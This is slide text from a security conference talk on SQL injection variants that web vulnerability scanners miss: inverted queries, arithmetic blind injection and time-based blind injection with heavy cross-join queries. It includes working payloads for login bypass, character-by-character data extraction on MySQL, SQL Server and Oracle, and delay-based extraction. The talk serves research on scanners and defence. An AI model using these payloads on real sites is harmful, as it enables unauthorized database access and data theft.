How "·$% developers defeat the web vulnerability scanners

How ?¿$·& developers defeat the most famous web

vulnerability scanners …or how to recognize old

friends

Chema AlonsoInformática64

José ParadaMicrosoft Ibérica

Agenda

1.- Introduction2.- Inverted Queries3.- Arithmetic Blind SQL Injection4.- Time-Based Blind SQL Injection using Heavey

Queries5.- Conclusions

1.-Introduction

SQL Injection is still here among us

Web Application Security Consortium: Comparision

http://projects.webappsec.org/Web-Application-Security-Statistics

12.186 sites97.554 bugs

Need to Improve Automatic Scanning

• Not always a manual scanning is possible– Time– Confidentiality– Money, money, money…

• Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.

2.-Inverted Queries

Homers, how are they?

• Lazy• Bad trainined• Poor Experience in

security stuff• Don´t like working• Don´t like computing• Don´t like coding• Don´t like you!

Flanders are Left-handed

Right

SELECT UIDFROM USERSWHERE NAME=‘V_NAME’ ANDPASSWORD=‘V_PASSW’;

Wrong?

SELECT UIDFROM USERSWHERE ‘V_NAME’=NAME

AND‘V_PASSW’=PASSWORD

Login Inverted QuerySelect uidFrom users where ‘v_name’=name and

‘v_pass’=password

http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1

Select uidFrom users where ‘Robert’=name and ‘Kubica’ or

‘1’=‘1’=password FAIL

Login Inverted SQL Injectionan example

Select uidFrom users where ‘v_name’=name and

‘v_pass’=password

http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica

Select uidFrom users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or

‘Kubica’=password Success

Blind Attacks• Attacker injects code but can´t access directly to

the data.• However this injection changes the behavior of

the web application. • Then the attacker looks for differences between

true code injections (1=1) and false code injections (1=2) in the response pages to extract data.– Blind SQL Injection– Biind Xpath Injection– Blind LDAP Injection

Blind SQL Injection Attacks

• Attacker injects:– “True where clauses”– “False where clauses“– Ex:

• Program.php?id=1 and 1=1• Program.php?id=1 and 1=2

• Program doesn’t return any visible data from database or data in error messages.

• The attacker can´t see any data extracted from the database.

Blind SQL Injection Attacks

• Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:– Different hashes– Different html structure– Different patterns (keywords)– Different linear ASCII sums– “Different behavior”• By example: Response Time

Blind SQL Injection Attacks

• If any difference exists, then:– Attacker can extract all information from database– How? Using “booleanization”

• MySQL:– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))

» “True-Answer Page” or “False-Answer Page”?• MSSQL:

– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)

• Oracle:– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)))

from all_users where rownum<=1)

Blind Inverted QuerySelect productFrom productsWhere v_value=id;

http://www.web.com/products.php?v_value=2 and 1=1

Select productFrom productsWhere 2 and 1=1=id;-> FAIL

The MySQL Case1 is True1=1=1 ->True1=1=(1+1-1)=abs(1)=1 -> True2=2=2 ->False-> 2=2 becomes True -> True=2-> True is equals to 1 then 1=2 is False

Select productFrom productsWhere v_value=id;

http://www.web.com/products.php?v_value=1 and 1=1

Select productFrom productsWhere 1 and 1=1=id;-> SUCCES (if there is a Id=1)

Web Scanner behaviors

• Acunetix• Paros• AppScan• W3af• Wapiti• Proxy Strike

Acunetix & Homer

Acunetix & Flanders

AppScan & Homer

AppScan & Flanders

Paros & Homer

Paros & Flanders

W3af & Homer

W3af & Flanders

Wapiti & Homer

Wapiti & Flanders

Demo

• W3af• Wapiti• Proxy Strike

Results

Normal Inverted MySQL MS SQL Server MySQL MS SQL Server

Numeric String Numeric String Numeric String Numeric String

Paros

AppScan

Acunetix

w3af

wapiti

Proxy Strike

In the end…

OUCH!!! Thank God for keep me safe

Solutions?

• Concat string injection• Arithmetic Blind SQL Injection• Time-Based Blind SQL injection– Delay Functions– Heavy queries

3.- Arithmetic

What about this queries?• How to detect/exploit this Blind SQLinjection

vulnerability?– The query forces the parameter to be numeric – SELECT field FROM table WHERE id=abs(param)– Ex:

Get Param(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint response

• Not AND or OR operators can be used.• Boolean logic needs to be created with math

operations

Arithmetic Blind SQL Injection

• Divide by zero (David Litchfield)– Id=A+(1/(ASCII(B)-C))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]

– TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception.

Arithmetic Blind SQL Injection• Sums and subtractions– Id=A+ASCII(B)-C•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]

– When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A

Arithmetic Blind SQL Injection

• Value type overflow– Id=A+((C/ASCII(B))*(K))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]•K-> Value that overflows the type defined for A

–(e.g. if A is integer, then K=2^32)

– When C/ASCII(B)==1, K*1 overflows the data type

Demo:

• Divide by zero• Sums and subtractions• Integer overflow

Conclusions

• Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”.– detects bugs in this kind of queries…– And also in Inverted queries in which a numeric

value is used

• Almost none of the vulnerability scanners are using this method

4.-Time-based Blind SQL Injection using heavy queries

Time-Based Blind SQL Injection• In scenarios with no differences between “True-

Answer Page” and “False-Answer Page”, time delays can be used.

• Injection forces a delay in the response page when the condition injected is True. - Delay functions:

• SQL Server: waitfor • Oracle: dbms_lock.sleep• MySQL: sleep or Benchmark Function• Postgres: pg_sleep

– Ex:• ; if (exists(select * from users)) waitfor delay '0:0:5’

Time-Based Blind SQL InjectionWhat about DBs without delay functions, i.e.:

Oracle connections MS Access DB2without PL/SQL injection

Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?

“Where-Clause” execution order

Select “whatever “From whateverWhere condition1 and condition2

- Condition1 lasts 10 seconds- Condition2 lasts 100 seconds

Which condition should be executed first?

The heavy condition first

Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time

TRUE FALSE FALSE 110 sec

TRUE TRUE TRUE 110 sec

FALSE Not evaluated FALSE 100 sec

The light condition first

Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time

TRUE FALSE FALSE 110 sec

TRUE TRUE TRUE 110 sec

FALSE Not evaluated FALSE 10 sec

Time-Based Blind SQL Injectionusing Heavy Queries

• Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.

• It depends on how the database engine evaluates the where clauses in the query.

• There are two types of database engines:– Databases without optimization process– Databases with optimization process

Time-Based Blind SQL Injectionusing Heavy Queries

• Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.

• The Cross-join injection must be heavier than the other condition.

• Attacker only have to know or to guess the name of a table with select permission in the database.

• Example in MSSQL:– Program.php?id=1 and (SELECT count(*) FROM sysusers

AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

“Default” tables to construct a heavy query

– Microsoft SQL Server• sysusers

– Oracle• all_users

– MySQL (versión 5)• information_schema.columns

– Microsoft Access• MSysAccessObjects (97 & 2000 versions)• MSysAccessStorage (2003 & 2007)

52

“Default” tables to construct a heavy query

• …or whatever you can guess– Clients– Customers– News– Logins– Users– Providers– ….Use your imagination…

Ex 1: MS SQL Server

Query takes 14 seconds -> True-Answer

Ex 1: MS SQL Server

• Query takes 1 second -> False-Answer

Ex 2: Oracle

Query Takes 22 seconds –> True-Answer

Ex 2: Oracle

Query Takes 1 second –> False-Answer

Ex 3: Access 2007

Query Takes 39 seconds –> True-Answer

Ex 3: Access 2007

Query Takes 1 second –> False-Answer

Marathon Tool

• Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.

• Schema Extraction from known databases• Extract data using heavy queries not matter in

which database engine (without schema)• Developed in .NET• Source code available• http://www.codeplex.com/marathontool

Demo: Marathon Tool

5.- Conclusions

The real world has plenty kinds of developers…

References• Inverted SQL queries (Spanish)http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html • Arithemtic Blind SQL Injection (spanish)http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-

de-ii.html • Time-Based Blind SQL Injection Using heavy queries & Marathon Toolhttp://www.defcon.org/images/defcon-16/dc16-presentations/alonso-

parada/defcon-16-alonso-parada-wp.pdf • Marathon Toolhttp://www.codeplex.com/marathontool • Connection String Attacks (spanish)http://www.slideshare.net/chemai64/connection-string-parameter-pollution

Don´t complain about your job!!

Thanks!Chema Alonso

(chema@informatica64.com)José Parada

(jparada@microsoft.com)